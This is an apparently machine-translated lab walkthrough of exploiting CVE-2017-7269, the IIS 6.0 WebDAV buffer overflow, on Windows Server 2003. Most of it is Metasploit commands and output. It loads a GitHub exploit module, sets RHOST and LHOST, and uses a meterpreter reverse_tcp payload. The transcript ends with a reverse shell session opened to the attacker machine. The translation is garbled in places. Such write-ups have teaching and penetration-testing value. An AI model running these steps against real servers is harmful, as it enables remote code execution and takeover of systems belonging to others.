Vulnerability Description
open WebDAV service buffer overrun vulnerability exists IIS 6.0 can lead to remote code execution, so for the current IIS 6.0 users, available workaround is to turn off WebDAV service.
Vulnerability ID
CVE-2017-7269
Vulnerability level
of high-risk
The impact of products
Microsoft Windows Server 2003 R2 IIS6.0 open WebDAV services
Vulnerability environment to build
my environment is windows 2003 R2 Enterprise Edition, enter the service management After installing IIS 6.0, the manager, there is a windows expand, expand, there is a webdav option to prohibit state this option by default, right-select permission it.
Subsequently windows + R-> services.msc-> open webcClient service, complete the configuration
Vulnerability testing
attack aircraft: kali IP: 192.168.48.131
victim machine: windows2003 IP: 192.168.48.146
download exploit: https: //github.com/Al1ex/CVE-2017-7269
the exp into
/ usr / share / metasploitframework / modules / exploits / windows / iis directory
msf > search cve-2017-7269
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/iis/cve-2017-7269 2017-03-31 good CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Microsoft IIS WebDav ScStoragePathFromUrl Overflow
msf > use exploit/windows/iis/cve-2017-7269
msf exploit(windows/iis/cve-2017-7269) > show options
Module options (exploit/windows/iis/cve-2017-7269):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpHost localhost yes http host for target
PhysicalPathLength 19 yes length of physical path for target(include backslash)
RHOST yes The target address
RPORT 80 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2
msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146 //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146 //设置对方网站
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131 //设置本机ip
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit //溢出
[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800
meterpreter >